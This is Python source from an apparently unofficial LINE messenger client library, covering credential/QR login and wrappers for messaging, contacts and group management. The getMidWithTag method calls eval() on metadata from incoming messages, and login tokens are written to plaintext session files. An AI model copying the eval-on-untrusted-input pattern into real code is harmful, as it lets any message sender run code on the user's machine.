from .models import SyncAsync, ApplicationHeader
from .connections import Connection
from .lib.Gen.ttypes import *
logs = log.LOGGER
class Auth(Connection):
def __init__(self, client, storage):
super().__init__(config.MAIN_PATH)
self.cli = client
self.LA, self.UA = self.cli.LA, self.cli.UA
self.updateHeaders({
'User-Agent': self.UA,
'X-Line-Application': self.LA,
'X-Line-Carrier': config.CARRIER,
"x-lal":"in_ID"
})
self.token_db = storage
self.afterLoginRemote = []
def remote(self, *func):
self.afterLoginRemote.extend(func)
#crypto
def __write_val(self, data):
return (chr(len(data)) + data)
def __gen_message(self, tuple_msg):
return (''.join(tuple_msg)).encode('utf-8')
def __rsa_crypt(self, message,RSA):
pub_key = rsa.PublicKey(int(RSA.nvalue, 16), int(RSA.evalue, 16))
crypto = rsa.encrypt(message, pub_key)
return crypto
def _encryptedEmailAndPassword(self, mail, passwd, RSA):
message_ = (
self.__write_val(RSA.sessionKey),
self.__write_val(mail),
self.__write_val(passwd),
)
message = self.__gen_message(message_)
crypto = self.__rsa_crypt(message, RSA).hex()
return crypto
def _encryptedPassword(self, phone, password, RSA):
message_ = (
self.__write_val(RSA.sessionKey),
self.__write_val(phone),
self.__write_val(password),
)
message = self.__gen_message(message_)
crypto = self.__rsa_crypt(message, RSA).hex()
return crypto
def waitForPhoneConfirm(self, verifier):
r = requests.get(config.BASE_URL + config.WAIT_FOR_MOBILE_PATH, headers={
'X-Line-Access': verifier
})
return r
def checkmail(self, mail):
if mail.endswith(".session"):
if os.path.exists(mail):
return True
def _validate_col(self, *val):
r = self.token_db.auth_col.find_one(*val)
if r:
return True
else:
return False
async def createLoginSession(self, name, token, mail, passwd, certt, qr):
if token is not None:
await self.loginWithAuthToken(token)
elif mail and passwd is not None:
if self.token_db is not None:
_name = name if name else mail
if self._validate_col({'name': _name, 'mail': mail}):
c = self.token_db.auth_col.find_one({'name': _name, 'mail': mail})
await self.loginWithCredential(mail=mail, password=<PASSWORD>, cert=c['cert'])
else:
await self.loginWithCredential(mail=mail, password=<PASSWORD>, name=_name)
else:
pname = name if name else mail +".session"
if self.checkmail(pname):
y = open(pname, "r").read().strip()
await self.loginWithCredential(mail=mail, password=<PASSWORD>, cert=y)
else:
await self.loginWithCredential(mail=mail, password=<PASSWORD>,
path = pname)
elif mail and passwd and certt is not None:
await self.loginWithCredential(mail=mail, password=<PASSWORD>, cert=certt)
elif qr and name is not None:
if self.token_db is not None:
if self._validate_col({'name': name}):
token = self.token_db.auth_col.find_one({'name': name})
await self.loginWithAuthToken(token['token'])
else:
await self.loginWithQrcode(name)
elif not self.token_db and name is not None and os.path.exists(name+'.session'):
token = open(name+'.session', "r").read()
await self.loginWithAuthToken(token.split(">")[1])
else:
await self.loginWithQrcode(path=name+".session" if name else None)
else:
raise ValueError("Must pass once paramater for login")
logs.info("Login success as %s" % (self.profile.displayName))
return True
async def loginWithQrcode(self, path=None):
self.url(config.MAIN_PATH)
qr = await self.call('getAuthQrcode', True, "AsyncLine", "")
print("line://au/q/"+qr.verifier)
r = self.waitForPhoneConfirm(qr.verifier)
vr = r.json()['result']['verifier']
self.url(config.AUTH_PATH)
rq = LoginRequest(
LoginType.QRCODE,
IdentityProvider.LINE,
None,
None,
True,
config.LOGIN_LOCATION,
"AsyncLine",
None,
vr,
None,
2
)
lr = await self.call('loginZ', rq)
self.updateHeaders({
'X-Line-Access': lr.authToken
})
self.authToken = lr.authToken
self.cert = lr.certificate
if path and path.endswith(".session"):
with open(path, "w") as fp:
text = "auth > {}".format(lr.authToken)
fp.write(text)
elif self.token_db is not None:
if not self._validate_col({'name': path}):
self.token_db.auth_col.insert_one({
'name': path,
'token': self.authToken
})
await self.afterLogin()
async def loginWithCredential(self, mail, password, name=None, cert=None, path=None):
self.url(config.MAIN_PATH)
rsakey = await self.call('getRSAKeyInfo', config.LOGIN_PROVIDER)
crypt = self._encryptedEmailAndPassword(mail, password, rsakey)
self.url(config.AUTH_PATH)
rq = LoginRequest(
LoginType.ID_CREDENTIAL,
IdentityProvider.LINE_PHONE,
rsakey.keynm,
crypt,
True,
config.LOGIN_LOCATION,
"AsyncLine",
cert,
None,
crypt.encode() if type(crypt) == str else crypt, #none, #crypt
0
)
result = await self.call('loginZ', rq)
self.url(config.MAIN_PATH)
if result.type == 3:
print("Please confirm this code on your device %s"% (result.pinCode))
r = self.waitForPhoneConfirm(result.verifier)
rq = LoginRequest(
LoginType.QRCODE,
IdentityProvider.LINE,
None, None, True,
config.LOGIN_LOCATION,
self.LA.split('\t')[0],
cert, r.json()['result']['verifier'],
None,
2
)
self.url(config.AUTH_PATH)
result = await self.call('loginZ', rq)
self.updateHeaders({
'X-Line-Access': result.authToken,
})
self.authToken = result.authToken
self.cert = result.certificate
self.url(config.MAIN_PATH)
elif result.type == 1:
self.authToken = result.authToken
self.cert = result.certificate
self.updateHeaders({
'X-Line-Access': result.authToken
})
else:
logs.critical('Login failed. got result type `%s`' % (result.type))
if path is not None:
with open(path, "a") as fp:
text = "\n{}".format(self.cert)
fp.write(text)
elif self.token_db is not None and name is not None:
if not self._validate_col({'name': name, 'mail': mail}):
if cert is None:
self.token_db.auth_col.insert_one({
'mail': mail,
'name': name,
'cert': self.cert
})
else:
r = self.token_db.auth_col.find_one({'name': name,'mail': mail})
if 'cert' not in r.keys():
self.token_db.auth_col.update_one({
'name': name,
'mail': mail
}, {'$set': {'cert': self.cert}})
await self.afterLogin()
async def loginWithAuthToken(self, authToken, path=None):
self.url(config.MAIN_PATH)
self.updateHeaders({
'X-Line-Access': authToken
})
self.authToken = authToken
await self.afterLogin()
async def afterLogin(self):
self.url(config.NORMAL_PATH)
self.profile = await self.call('getProfile')
self.last_rev = await self.call('getLastOpRevision')
self.settings = await self.call('getSettings')
#self.groups_ids = await self.call('getGroupIdsJoined')
self.authToken = self.authToken
for remoteFunc in self.afterLoginRemote:
remoteFunc(**{
'profile': self.profile,
'settings': self.settings,
'rev': self.last_rev,
#'groups_ids': self.groups_ids,
'mid': self.profile.mid,
'authToken': self.authToken,
'cert': getattr(self, 'cert', None),
'app_header': (self.LA, self.UA),
})
async def logout(self):
await self.call("logoutZ")
```
#### File: AsyncLine/AsyncLine/talk.py
```python
from .auth import Auth
from . import config as Config
from .lib.Gen.ttypes import *
from typing import Union, Any, List
from .connections import Connection
from random import randint
import asyncio, json
class Talk(Connection):
_unsendMessageReq = 0
def __init__(self, auth):
super().__init__("/S4")
self.auth = auth
self.cl = auth.cli
self.updateHeaders({
'user-agent': self.auth.UA,
'x-line-application': self.auth.LA,
})
def afterLogin(self, *args, **kws):
for k,v in kws.items():
try:
setattr(self, k, v)
except:
pass
self.updateHeaders({
"X-Line-Access": self.authToken
})
async def acquireEncryptedAccessToken(self, featureType: int = 2) -> str:
"""
Use this method to get your Encryption Token.
Args:
featureType class :lib.Gen.ttypes.FeatureType:
1 = OBS_VIDEO
2 = OBS_GENERAL
Return:
<class 'str'>
"""
return await self.call("acquireEncryptedAccessToken", featureType)
async def getProfile(self) -> Profile:
"""
A simple method to get your profile information. Requires no parameters.
Return:
class <class 'AsyncLine.lib.Gen.ttypes.Profile'>
"""
return await self.call("getProfile")
async def getSettings(self) -> Settings:
"""
A simple method to get your Settings. Requires no parameters.
Return:
class <class 'AsyncLine.lib.Gen.ttypes.Settings'>
"""
return await self.call("getSettings")
async def getUserTicket(self) -> Union[str, Ticket]:
"""
A simple method to get your ticket. Requires no parameters.
Return:
class <class 'AsyncLine.lib.Gen.ttypes.Ticket'>
"""
return await self.call("getUserTicket")
async def generateUserTicket(self,
expirationTime: int = 100,
maxUseCount: int = 100) -> Ticket:
"""
Use this method to generate your Ticket.
Args:
expirationTime: lifetime of the Ticket until it expires
maxUseCount: maximum number of users that can use the Ticket
Return:
class <class 'AsyncLine.lib.Gen.ttypes.Ticket'>
"""
try:
return await self.getUserTicket()
except:
await self.reissueUserTicket(expirationTime, maxUseCount)
return await self.getUserTicket()
async def reissueGroupTicket(self, chat_id: str) -> str:
"""
Use this method for getting group Ticket.
Args:
chat_id: string of chat_id
Return:
class :str:
"""
return await self.call("reissueGroupTicket", chat_id)
async def reissueUserTicket(self, expirationTime: int = 100, maxUseCount: int = 10) -> str:
"""
Use this method to reissue your Ticket.
Args:
expirationTime: lifetime of the Ticket until it expires
maxUseCount: maximum number of users that can use the Ticket
Return:
class :str:
"""
return await self.call("reissueUserTicket", expirationTime, maxUseCount)
async def updateProfile(self, profile_obj: Profile) -> bool:
"""
Use this method for change your Profile Attribute.
Args:
profile_obj: profile obj from <class 'AsyncLine.lib.Gen.ttypes.Profile'>
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.call("updateProfile", 0, profile_obj))
async def updateSettings(self, settings_obj: Settings) -> bool:
"""
Use this method for change your Settings Attribute.
Args:
settings_obj: settings obj from <class 'AsyncLine.lib.Gen.ttypes.Settings'>
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.call("updateSettings", 0, settings_obj))
async def updateProfileAttribute(self, attribute: ProfileAttribute, value: str) -> bool:
"""
Use this method for change your ProfileAttribute.
Args:
attribute: int of ProfileAttribute <class 'AsyncLine.lib.Gen.ttypes.ProfileAttribute>
ALL = 511
EMAIL = 1
DISPLAY_NAME = 2
PHONETIC_NAME = 4
PICTURE = 8
STATUS_MESSAGE = 16
ALLOW_SEARCH_BY_USERID = 32
ALLOW_SEARCH_BY_EMAIL = 64
BUDDY_STATUS = 128
MUSIC_PROFILE = 256
value: value for attribute will passed as string
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.call("updateProfileAttribute", 0, attribute, value))
async def updateContactSetting(self, mid: str, attribute: int, value: str):
"""
Use this method to Update your ContactSettings.
Args:
attribute: int of ContactSettings <class 'AsyncLine.lib.Gen.ttypes.ProfileAttribute>
CONTACT_SETTING_NOTIFICATION_DISABLE = 1
CONTACT_SETTING_DISPLAY_NAME_OVERRIDE = 2
CONTACT_SETTING_CONTACT_HIDE = 4.
CONTACT_SETTING_FAVORITE = 8
CONTACT_SETTING_DELETE = 16
value: value for attribute will passed as string
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.call("updateContactSetting", 0, mid, attribute, value))
async def disableNotifContact(self, mid: str):
"""
A simple method to disable notification messages from your contact.
Args:
mid: string of user mid
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.updateContactSetting(mid, 1, "True"))
async def renameContact(self, mid: str, new_name: str):
"""
A simple method to rename your contact.
Args:
mid: string of user mid
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.updateContactSetting(mid, 2, new_name))
async def addContactToHiddenList(self, mid: str):
"""
A simple method to add your contact to the hidden list.
Args:
mid: string of user mid
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.updateContactSetting(mid, 4, "True"))
async def addContactToFavouriteList(self, mid: str):
"""
A simple method to add your contact to the favorite list.
Args:
mid: string of user mid
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.updateContactSetting(mid, 8, "True"))
async def deleteContact(self, mid):
"""
A simple method to delete a friend from your contacts.
Args:
mid: string of user mid
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.updateContactSetting(mid, 16, "True"))
async def removeContactFromHiddenList(self, mid: str):
"""
A simple method to remove your contact from the hidden list.
Args:
mid: string of user mid
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.updateContactSetting(mid, 4, "False"))
async def removeContactFromFavouriteList(self, mid: str):
"""
A simple method to remove your contact from the favorite list.
Args:
mid: string of user mid
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.updateContactSetting(mid, 8, "False"))
async def getContacts(self, mids: Union[str, list, tuple]) -> Union[Contact, list]:
"""
Use this method to get information for a specific mid
Args:
mids: pass string or multiple mids as list of strings for getting
more than one Contact at once.
Return:
<class 'AsyncLine.lib.Gen.ttypes.Contact>
or
<class 'list'>
"""
mids = mids if isinstance(mids, (list, tuple)) else [mids]
if len(mids) <= 1:
return await self.call("getContact", mids[0])
else:
return await self.call("getContacts", mids)
async def blockContact(self, mids: Union[str, list, tuple]) -> bool:
"""
Use this method to block contacts by specific mid
Args:
mids: pass string or multiple mids as list of strings for blocking
more than one Contact at once.
Return:
bool == false, because this will returning NoneType as False
"""
if isinstance(mids, str):
return bool(await self.call("blockContact", 0, mids))
elif isinstance(mids, (list, tuple)):
for mid in mids:
bool(await self.call("blockContact", 0, mid))
async def unblockContact(self, mids: Union[str, list, tuple]) -> bool:
"""
Use this method to unblock contacts by specific mid
Args:
mids: pass string or multiple mids as list of strings for unblocking
more than one Contact at once.
Return:
bool == false, because this will returning NoneType as False
"""
if isinstance(mids, str):
return bool(await self.call("unblockContact",0, mids, ""))
elif isinstance(mids, (list, tuple)):
for mid in mids:
bool(await self.call("unblockContact",0, mid, ""))
async def findAndAddContactsByMid(self, mids: str) -> bool:
"""
Use this method to find and add contact by mid
Args:
mids: string of mids users
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.call("findAndAddContactsByMid", 0, mids, 0, ""))
async def findAndAddContactsByUserid(self, user_id: str) -> bool:
"""
Use this method to find and add contact by user_id
Args:
user_id: pass string from user id
Return:
bool == false, because this will returning NoneType as False
"""
return bool(await self.call("findAndAddContactsByUserid", 0, user_id))
async def findContactByUserid(self, user_id: str) -> Contact:
"""
Use this method to find contact by user_id
Args:
user_id: pass string of user id
Return:
<class 'AsyncLine.lib.Gen.ttypes.Contact'>
"""
return await self.call("findContactByUserid", user_id)
async def findContactByTicket(self, ticket: str) -> Contact:
"""
Use this method to find contact by ticket user
Args:
ticket: pass string of user id
Return:
<class 'AsyncLine.lib.Gen.ttypes.Contact'>
"""
return await self.call("findContactByUserTicket", ticket)
async def getChatRoomAnnouncements(self, chat_ids: Union[list, str]) -> List[ChatRoomAnnouncement]:
return await self.call("getChatRoomAnnouncements", chat_ids)
async def removeChatRoomAnnouncement(self, chat_id: str, announceSeq: int):
return await self.call("removeChatRoomAnnouncement", 0, chat_id, announceSeq)
async def createChatRoomAnnouncement(self,
message: Message,
text: str,
thumbnail=None,
link = None) -> ChatRoomAnnouncement:
content = ChatRoomAnnouncementContents(
displayFields = 11,
text = text,
link =link if link else "line://nv/chatMsg?chatId=%s&messageId=%s" % (message.to, message.id),
thumbnail = thumbnail
)
return await self.call("createChatRoomAnnouncement", 1, message.to, 0, content)
async def getRecentMessages(self, messageBoxId, messagesCount):
return await self.call("getRecentMessagesV2", messageBoxId, messagesCount)
async def getPreviousMessagesWithReadCount(self,
message: Message,
messagesCount: int = 10) -> Message:
id = MessageBoxV2MessageId(message.createdTime, int(message.id))
return await self.call("getPreviousMessagesV2WithReadCount", message.to, id, messagesCount)
async def getServerTime(self) -> int:
return await self.call("getServerTime")
async def getAllContactIds(self) -> list:
"""
A simple method to get all of mid from your contacts
Return:
<class 'list'>
"""
return await self.call("getAllContactIds")
async def getBlockedContactIds(self) -> list:
"""
A simple method to get all of mid from your blocked contacts
Return:
<class 'list'>
"""
return await self.call("getBlockedContactIds")
async def getFavoriteMids(self) -> list:
"""
A simple method to get all of mid from your favorite contacts
Return:
<class 'list'>
"""
return await self.call("getFavoriteMids")
async def getHiddenContactMids(self) -> list:
"""
A simple method to get all of mid from your hidden contacts
Return:
<class 'list'>
"""
return await self.call("getHiddenContactMids")
async def createGroup(self, name: str, mid_users: list) -> bool:
"""
Use this method to create a group and invite users by their mids
Args:
name: name of the group to create
mid_users: list of user mids to invite
Return:
bool == False, because this will returning NoneType as False
"""
return bool(await self.call("createGroup", 0, name, mid_users))
async def getGroups(self, chat_ids: Union[str, list]) -> Union[list, Group]:
"""
Use this method to get information about groups
Args:
chat_ids: string or multiple chat_ids of list
for getting more than once
Return:
<class 'AsyncLine.lib.Gen.ttypes.Group'> if chat_ids only one
if list returned <class 'list'>
"""
ids = chat_ids if isinstance(chat_ids, list) else [chat_ids]
if len(ids) <= 1:
return await self.call("getGroup", ids[0])
else:
return await self.call("getGroups", ids)
async def getGroupWithoutMembers(self, chat_id: str) -> Group:
"""
Use this method to get information about a group, excluding Contact objects
Args:
chat_id: string of chat_id
Return:
<class 'AsyncLine.lib.Gen.ttypes.Group'>
"""
return await self.call("getGroupWithoutMembers", chat_id)
async def getGroupsV2(self, chat_id: Union[list, str]) -> Group:
"""
Use this method to get custom information about a group,
including the mids of members and pending members;
faster than getGroups and getCompactGroup
Args:
chat_id: string of chat_id
Return:
<class 'AsyncLine.lib.Gen.ttypes.Group'>
or <class 'list'>
"""
return await self.call("getGroupsV2", chat_id)
async def getCompactGroup(self, chat_id: str) -> Group:
"""
Use this method to get compact information about a group;
excludes some data and is faster than getGroups
Args:
chat_id: string of group id
Return:
<class 'AsyncLine.lib.Gen.ttypes.Group'>
"""
return await self.call("getCompactGroup", chat_id)
async def getGroupIdsInvited(self) -> list:
"""
Use this method to get the ids of all groups you have been invited to
Return:
<class 'list'>
"""
return await self.call("getGroupIdsInvited")
async def getGroupIdsJoined(self) -> list:
"""
Use this method to get the ids of all groups you have joined
Return:
<class 'list'>
"""
return await self.call("getGroupIdsJoined")
async def acceptGroupInvitation(self, chat_id: str, ticket: str = None) -> bool:
"""
Use this method to join a specific chat_id, or use a ticket if it is not None
Args:
chat_id: string of chat_id
ticket: string of ticket from group
Return:
bool == False, because this will returning NoneType as False
"""
if ticket is not None:
return bool(await self.call("acceptGroupInvitationByTicket", 0, chat_id, ticket))
else:
return bool(await self.call("acceptGroupInvitation", 0, chat_id))
async def cancelGroupInvitation(self, chat_id: str, mid_users: Union[str, list]) -> bool:
"""
Use this method to cancel a user's invitation to a group
Args:
chat_id: string of id from group id
mid_users: string or multiple list of string from mid_users
to cancel more than once
Return:
bool == False, because this will returning NoneType as False
"""
mid_users = mid_users if isinstance(mid_users, list) else [mid_users]
if len(mid_users) >= 1:
for mid in mid_users:
bool(await self.call("cancelGroupInvitation", 0, chat_id, [mid]))
else:
return bool(await self.call("cancelGroupInvitation", 0, chat_id, mid_users))
async def inviteIntoGroup(self, chat_id: str, mid_users: list) -> bool:
"""
Use this method to invite some or many user into group
Args:
chat_id: string of id from group id
mid_users: string or multiple list of string from mid_users
to invite more than once
Return:
bool == False, because this will returning NoneType as False
"""
mids = mid_users if isinstance(mid_users, list) else [mid_users]
return bool(await self.call("inviteIntoGroup", 0, chat_id, mids))
async def kickoutFromGroup(self, chat_id: str, mid_users: Union[str, list]) -> bool:
"""
Use this method to kick some or many user from group
Args:
chat_id: string of id from group id
mid_users: string or multiple list of string from mid_users
to kick more than once
Return:
bool == False, because this will returning NoneType as False
"""
mids = mid_users if isinstance(mid_users, list) else [mid_users]
if len(mids) > 1:
for mid in mids:
bool(await self.call("kickoutFromGroup", 0, chat_id, [mid]))
else:
return bool(await self.call("kickoutFromGroup", 0, chat_id, mids))
async def leaveGroup(self, chat_id: str) -> bool:
"""
Use this method to leave from group
Args:
chat_id: string of id from group id
Return:
bool == False, because this will returning NoneType as False
"""
return bool(await self.call("leaveGroup", 0, chat_id))
async def rejectGroupInvitation(self, chat_id: str) -> None:
"""
Use this method to reject a group you have been invited to
Args:
chat_id: string of id from group id, see self.getGroupIdsInvited
Return:
bool == False, because this will returning NoneType as False
"""
return bool(await self.call("rejectGroupInvitation", 0, chat_id))
async def updateGroupPreferenceAttribute(self, chat_id:str, attribute: dict) -> bool:
"""
Use this method to update your group preference attribute
Args:
chat_id: string of id from group id
attribute: dict of attribute from {<class 'AsyncLine.lib.Gen.ttypes.GroupPreferenceAttribute'>, string}
INVITATION_TICKET = 1
FAVORITE_TIMESTAMP = 2
e.g: cl.updateGroupPreferenceAttribute(chat_id, {1: "True"})
Return:
bool == False, because this will returning NoneType as False
"""
return bool(await self.call("updateGroupPreferenceAttribute", 0, chat_id, attribute))
async def updateGroup(self, obj: Union[Group]) -> bool:
"""
Use this method to update Group attribute
Args:
obj: object from Group classes <class 'AsyncLine.lib.Gen.ttypes.Group'>
e.g:
group = cl.getGroup(chat_id)
group.preventedJoinByTicket = False
cl.updateGroup(group)
this will disable Joining by ticket group
Return:
bool == False, because this will returning NoneType as False
"""
return bool(await self.call("updateGroup", 0, obj))
async def getRoom(self, room_id: str) -> Room:
"""
Use this method to get Room Informations
Args:
room_id: string of room_id
Return:
<class 'AsyncLine.lib.Gen.ttypes.Room'>
"""
return await self.call("getRoom", room_id)
async def getCompactRoom(self, room_id: str) -> Room:
"""
Use this method to get Compact Room Informations
fasted than getRoom
Args:
room_id: string of room_id
Return:
<class 'AsyncLine.lib.Gen.ttypes.Room'>
"""
return await self.call("getCompactRoom", room_id)
async def inviteIntoRoom(self,room_id:str, mid_users: Union[str, list]) -> bool:
"""
Use this method to invite some or many user into room
Args:
room_id: string of id from room id
mid_users: string or multiple list of string from mid_users
to invite more than once
Return:
bool == False, because this will returning NoneType as False
"""
mids = mid_users if isinstance(mid_users, list) else [mid_users]
return await self.call("inviteIntoRoom", 0, room_id, mids)
async def leaveRoom(self, room_id: str) -> bool:
"""
Use this method to leave from room
Args:
room_id: string of id from room id
Return:
bool == False, because this will returning NoneType as False
"""
return await self.call("leaveRoom", 0, room_id)
async def sendChatRemoved(self, mid, message_id):
return await self.call("sendChatRemoved", 0, mid, message_id, randint(0, 10))
async def sendChatChecked(self, mid, message_id):
return await self.call('sendChatChecked', 0, mid, message_id, randint(0, 10))
async def sendMention(self,
chat_id: str,
mids: list = [],
separator: str = "\n",
first_text: str = None,
end_text: str = None,
enum: bool = False,
pretty: bool = True):
"""
Use this method to send a Mention to all or some users.
Args:
chat_id: string of chat_id or room_id
mids: list of user mids in the group
separator: (string | None, optional) separator placed before each mention line
first_text: (string | None, optional) text placed at the top of the mentions
end_text: (string | None, optional) text placed after the last mention
pretty: bool, if True the mentions are output in a more readable form
enum: bool, if True the mentions are numbered
i.e;
1. @user1
2. @user2
if separator is not None and enum is True this will output like
- 1. @user1
- 2. @user2
using "-" as separator
Return:
<class 'bool'> or <class 'AsyncLine.lib.Gen.ttypes.Room'>
"""
mids = mids if isinstance(mids, list) else [mids]
length_mids = len(mids)//20+1
text = '' if first_text is None else first_text
mention = '@m{}'.format('\n' if pretty else ' ')
for count in range(length_mids):
mentionees = []
if enum:
for no, mid in enumerate(mids[count*20:(count+1)*20], 1):
text += '{}{}. {}'.format(separator, no, mention)
slen = len(text) - 3
elen = len(text) + 3
mentionees.append({'S': str(slen), 'E': str(elen - 4), 'M': mid})
if mid == mids[-1]:
text += '' if end_text is None else end_text
else:
for mid in mids[count*20:(count+1)*20]:
text += '%s%s' % (separator, mention)
slen = len(text) - 3
elen = len(text) + 3
mentionees.append({'S': str(slen), 'E': str(elen - 4), 'M': mid})
if mid == mids[-1]:
text += '' if end_text is None else end_text
if text:
if text.endswith("\n"):
text = text[:-1]
await self.sendMessage(chat_id, text, {'MENTION': json.dumps({'MENTIONEES': mentionees})}, 0)
text = ""
async def sendLocation(self,
chat_id: str,
address: str,
latitude: float,
longitude: float,
phone: str = None,
title: str = None
) -> Union[str, Message]:
"""
Use this method to send a Location
Args:
chat_id: string of mid from group id
address: string of your address location
latitude: float of your address latitude
longitude: float of your address longitude
phone: string of your number phone (optional)
title: string that will be show on Location content
Return:
<clas 'Message'>
"""
location = Location(title="Location" if not title else title,
address=address,
phone=phone,
latitude=latitude,
longitude=longitude,
)
return await self.sendMessage(chat_id, text="", location=location)
async def sendMessage(self,
chat_id: str,
text: str,
contentMetadata: dict = None,
contentType: int = 0,
*args, **kwrgs
) -> Union[str, Message]:
"""
Use this method to send a Message of any content type
Args:
chat_id: string of mid from group id
text: string of some text
contentMetadata: dict of contentMetadata for sending
contentType: int of contentType see <class 'AsyncLine.lib.Gen.ttypes.ContentType'>
Return:
<class 'AsyncLine.lib.Gen.ttypes.Message'>
"""
msg = Message(to=chat_id,
text = text,
contentType = contentType,
contentMetadata = {'LINE_RECV':'1'}
if contentMetadata is None \
else contentMetadata,
*args, **kwrgs
)
return await self.call("sendMessage", 0, msg)
async def sendReply(self,
relatedMessage_id: str,
chat_id: str,
text: str,
contentMetadata: dict = None,
contentType: int = 0
) -> Union[str, Message]:
"""
Use this method to send a Reply Message of any content type
Args:
relatedMessage_id: string of Message.id from user or self
chat_id: string of mid from group id
text: string of some text that will be sending
contentType: (int, optional) pass ContentType for sending 0 that meant type text
contentMetadata: (dict, optional) pass a dict data for metadata on message
Return:
<class 'AsyncLine.lib.Gen.ttypes.Message'>
"""
return await self.sendMessage(chat_id,
text,
contentType = contentType,
contentMetadata = contentMetadata,
relatedMessageServiceCode=1,
messageRelationType = 3,
relatedMessageId = relatedMessage_id
)
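# Usage sketch for sendReply inside a message handler (msg is assumed to be a
# received Message object; the text is illustrative):
#   await cl.talk.sendReply(relatedMessage_id=msg.id, chat_id=msg.to,
#                           text="replying to your message")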
async def sendMusicMessage(self,
chat_id: str,
title: str = "Music Messaging",
sub_text: str = "Music Message",
url: str = None,
preview_url: str = None,
) -> Message:
m = self.auth.profile.mid
url = url if url else "line.me/ti/p/~{}".format((await self.generateUserTicket(-1)).id)
preview_url = preview_url if preview_url else 'https://obs.line-apps.com/os/p/{}'.format(m)
meta = {
'text': title,
'subText': sub_text,
'a-installUrl': url,
'i-installUrl': url,
'a-linkUri': url,
'i-linkUri': url,
'linkUri': url,
'previewUrl': preview_url,
'type': 'mt',
'a-packageName': 'com.spotify.music',
'countryCode': 'JP',
'id': 'mt000000000a6b79f9'
}
return await self.sendMessage(chat_id, None, contentType=19, contentMetadata=meta)
async def sendContact(self, chat_id: str, mid: str) -> Message:
meta = {'mid': mid}
return await self.sendMessage(chat_id, None, contentType=13, contentMetadata=meta)
async def unsendMessage(self, message_id: str) -> bool:
"""
Use this method to unsend a Message of any content type
Args:
message_id: string of your message id
Return:
bool == False, because this will returning NoneType as False
"""
self._unsendMessageReq += 1
return bool(await self.call("unsendMessage", self._unsendMessageReq, message_id))
def getMidWithTag(self, message: Message) -> list:
"""
Use this method to get the mids of users in a Mention
Args:
message: <class 'AsyncLine.lib.Gen.ttypes.Message'>
e.g
async def _(message):
cl.talk.getMidWithTag(message)
Return:
<class 'list'> of mid user
"""
if message.contentMetadata["MENTION"] \
and message.contentMetadata is not None:
key = eval(message.contentMetadata["MENTION"])
if len(key["MENTIONEES"]) <= 1:
return key["MENTIONEES"][0]["M"]
else:
mm = []
for mid in key["MENTIONEES"]:
mm.append(mid["M"])
return mm
async def sendAudio(self,
to: str,
path: str = None,
url: str = None,
remove_path: bool = False) -> bool:
"""
Use this method to send an Audio message.
Note: if the url argument is given, path cannot be used.
Args:
to: mid of the group or user to send to
path: path of the audio file to send
url: url of the audio to send
remove_path: bool, delete the temp file after the content is downloaded
Return:
<class 'bool'> is True
"""
if path is not None and url is not None:
raise Exception("if args url is given, it cannot use the path")
if path is None and url is not None:
path = await self.cl.download_fileUrl(url)
objectId = (await self.sendMessage(to, text=None, contentType = 3)).id
return await self.cl.uploadObjTalk(path=path, types='audio', remove_path=remove_path, objId=objectId)
async def sendImage(self,
to: str,
path: str = None,
url: str = None,
remove_path: bool = False,
chunked: bool = False) -> bool:
"""
Use this method to send an Image message.
Note: if the url argument is given, path cannot be used.
Args:
to: mid of the group or user to send to
path: path of the image file to send
url: url of the image to send
remove_path: bool, delete the temp file after the content is downloaded
chunked: bool, download the url content in chunks
Return:
<class 'bool'> is True
"""
if path is not None and url is not None:
raise Exception("if args url is given, it cannot use the path")
if url is not None and path is None:
path = await self.cl.download_fileUrl(url, chunked=chunked)
objectId = (await self.sendMessage(to, text=None, contentType=1)).id
return await self.cl.uploadObjTalk(path=path, types='image', remove_path=remove_path, objId=objectId)
async def sendVideo(self,
to: str,
path: str = None,
url: str = None,
remove_path: bool = False,
chunked: bool = False) -> bool:
"""
Use this method to send a Video message.
Note: if the url argument is given, path cannot be used.
Args:
to: mid of the group or user to send to
path: path of the video file to send
url: url of the video to send
remove_path: bool, delete the temp file after the content is downloaded
chunked: bool, download the url content in chunks
Return:
<class 'bool'> is True
"""
if path is not None and url is not None:
raise Exception("if args url is given, it cannot use the path")
if url is not None and path is None:
path = await self.cl.download_fileUrl(url, chunked=chunked)
objectId = (await self.sendMessage(to, text=None, contentMetadata={'VIDLEN': '60000','DURATION': '60000'}, contentType = 2)).id
return await self.cl.uploadObjTalk(path=path, types='video', remove_path=remove_path, objId=objectId)
async def sendGif(self,
to: str,
path: str = None,
url: str = None,
remove_path: bool = False) -> bool:
"""
Use this method to send a Gif message.
Note: if the url argument is given, path cannot be used.
Args:
to: mid of the group or user to send to
path: path of the gif file to send
url: url of the gif to send
remove_path: bool, delete the temp file after the content is downloaded
Return:
<class 'bool'> is True
"""
if path is not None and url is not None:
raise Exception("if args url is given, it cannot use the path")
if url is not None and path is None:
path = await self.cl.download_fileUrl(url)
return await self.cl.uploadObjTalk(to=to, path=path, types='gif', remove_path=remove_path)
async def sendFile(self,
to: str,
path: str = None,
file_name: str = None,
remove_path=False):
"""
Use this method to send a File message.
Args:
to: mid of the group or user to send to
path: path of the file to send
file_name: display name for the file; defaults to the file's own name
remove_path: bool, delete the temp file after the content is downloaded
Return:
<class 'bool'> is True
"""
fp = open(path, 'rb')
if file_name is None:
file_name = fp.name
objectId = (await self.sendMessage(to, text=None, contentMetadata={'FILE_NAME': str(file_name),'FILE_SIZE': str(len(fp.read()))}, contentType = 14)).id
return await self.cl.uploadObjTalk(path=path, types='file', remove_path=remove_path, objId=objectId)
async def fetchOps(self, localRev, count=10):
return await self.cl.call('fetchOps', localRev, count, 0, 0)
async def fetchOperations(self, localRev, count=10):
return await self.cl.call('fetchOperations', localRev, count)
async def getReadMessageOps(self, chat_id):
return await self.call('getReadMessageOps', chat_id)
async def removeMessage(self, message_id):
return await self.call('removeMessage', message_id)
```
#### File: AsyncLine/examples/conversation.py
```python
from AsyncLine import *
import asyncio
cl = Client('ios')
